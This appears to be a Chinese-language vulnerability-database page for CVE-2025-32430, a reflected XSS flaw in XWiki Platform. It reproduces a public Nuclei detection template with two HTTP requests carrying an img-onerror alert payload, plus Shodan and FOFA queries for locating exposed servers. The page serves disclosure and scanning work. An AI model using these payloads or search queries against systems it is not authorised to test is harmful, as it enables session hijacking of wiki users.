CVE-2025-32430: XWiki Platform - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: XWiki Platform | POC: 已公开

漏洞描述

XWiki Platform versions >= 4.2-milestone-3 and < 16.4.8, >= 16.5.0-rc-1 and < 16.10.6, and >= 17.0.0-rc-1 and < 17.3.0-rc-1 are vulnerable to reflected XSS in two templates. The vulnerability allows an attacker to execute malicious JavaScript code in the context of the victim's session by getting the victim to visit an attacker-controlled URL.

PoC代码[已公开]

id: CVE-2025-32430

info:
  name: XWiki Platform - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    XWiki Platform versions >= 4.2-milestone-3 and < 16.4.8, >= 16.5.0-rc-1 and < 16.10.6, and >= 17.0.0-rc-1 and < 17.3.0-rc-1 are vulnerable to reflected XSS in two templates. The vulnerability allows an attacker to execute malicious JavaScript code in the context of the victim's session by getting the victim to visit an attacker-controlled URL.
  reference:
    - https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-m9x4-w7p9-mxhx
    - https://jira.xwiki.org/browse/XWIKI-23096
    - https://nvd.nist.gov/vuln/detail/CVE-2025-32430
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
    cvss-score: 6.5
    cve-id: CVE-2025-32430
    epss-score: 0.00304
    epss-percentile: 0.53255
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 2
    vendor: xwiki
    product: xwiki-platform
    shodan-query: http.html:"data-xwiki-reference"
    fofa-query: body="data-xwiki-reference"
  tags: cve,cve2025,xwiki,xss

http:
  - raw:
      - |
        GET /xwiki/bin/view/Main/?xpage=job_status_json&jobId=asdf&translationPrefix=%3Cimg%20src=1%20onerror=alert(document.domain)%3E HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /xwiki/bin/view/Main/?xpage=distribution&extensionId=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&extensionVersionConstraint=%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<img src=1 onerror=alert(document.domain)>.notFound'

      - type: word
        part: content_type
        words:
          - 'text/html'

      - type: status
        status:
          - 404
# digest: 4a0a00473045022100d2cfa2d086f2265c22a738105b619080ffdc1b339300cf44363679d719ef78d6022037f51e72715a7498b97cc16e75078f5730a56c1e40ede25a80826dfb9e8353f2:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-32430.yaml

相关漏洞推荐